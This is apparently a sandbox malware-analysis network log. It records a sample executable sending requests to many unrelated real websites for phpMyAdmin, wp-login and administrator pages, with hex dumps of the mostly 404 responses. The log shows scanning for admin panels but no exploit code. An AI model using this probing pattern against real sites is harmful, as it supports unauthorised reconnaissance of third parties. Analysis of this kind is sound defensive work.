                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1086INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 37 2e 39 32 33 31 30 33 37 32 39 34 34 36 32 36 31 33 30 39 32 32 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978377.92310372944626130922Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Opti
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC166INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20
                                                                                                                                                                                                    Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39
                                                                                                                                                                                                    Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC207INData Raw: 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    192192.168.2.459348120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC256OUTGET /saml/index.php?page=%2Fadministrator%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1094INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-Control: no-cache, must-revalida
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    193192.168.2.45969134.208.26.1524436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC177OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC411INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 31 35 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheX-Powered-By: PHP/7.4.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://micro-design.com/wp-json/>; rel="https://api
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><script>win
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC8192INData Raw: 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 32 32 32 32 32 32 32 32 32 32 32 32 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 36 36 36 36 36 36 36 36 36 36 36 37 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 38 38 38 38 38 38 38 38 38 38 38 39 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ntent h1{font-size:40px;font-size:2.2222222222222rem;line-height:1.4em;}h2,.entry-content h2{font-size:30px;font-size:1.6666666666667rem;line-height:1.25em;}h3,.entry-content h3{font-size:25px;font-size:1.3888888888889rem;line-height:1.2em;}h4,.entry-cont
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC8192INData Raw: 2e 35 65 6d 20 31 2e 35 65 6d 3b 6d 61 72 67 69 6e 3a 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 61 72 74 5f 69 74 65 6d 2e 65 64 64 5f 63 68 65 63 6b 6f 75 74 20 7b 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 31 2e 35 65 6d 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 3e 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 5f 5f 65 6d 70 74 79 2d 6d 65 73 73 61 67 65
                                                                                                                                                                                                    Data Ascii: .5em 1.5em;margin: 0;text-align: center;}.astra-cart-drawer .astra-cart-drawer-content .cart_item.edd_checkout {padding: 1em 1.5em 0;text-align: center;margin-top: 0;}.astra-cart-drawer .widget_shopping_cart_content > .woocommerce-mini-cart__empty-message
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    194192.168.2.45995076.223.105.2304436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC207OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: saudi-jamac.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: dps_site_id=us-east-1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC288INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 34 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 65 72 76 65 72 3a 20 44 50 53 2f 32 2e 30 2e 30 2b 73 68 61 2d 33 32 31 30 62 34 39 0d 0a 58 2d 56 65 72 73 69 6f 6e 3a 20 33 32 31 30 62 34 39 0d 0a 58 2d 53 69 74 65 49 64 3a 20 75 73 2d 65 61 73 74 2d 31 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 64 70 73 5f 73 69 74 65 5f 69 64 3d 75 73 2d 65 61 73 74 2d 31 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-3210b49X-Version: 3210b49X-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sun, 26 Nov 2023 05
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC964INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    195192.168.2.45994834.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1085INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 37 2e 39 37 30 31 30 33 36 33 34 30 34 30 37 32 37 39 30 32 35 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978377.9701036340407279025Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Optio
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC167INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sca
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c
                                                                                                                                                                                                    Data Ascii: le=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e
                                                                                                                                                                                                    Data Ascii: ices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC206INData Raw: 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    196192.168.2.45977495.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC227OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: OF=3dbfg2bnrmlhvmjhpi48421sg2
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
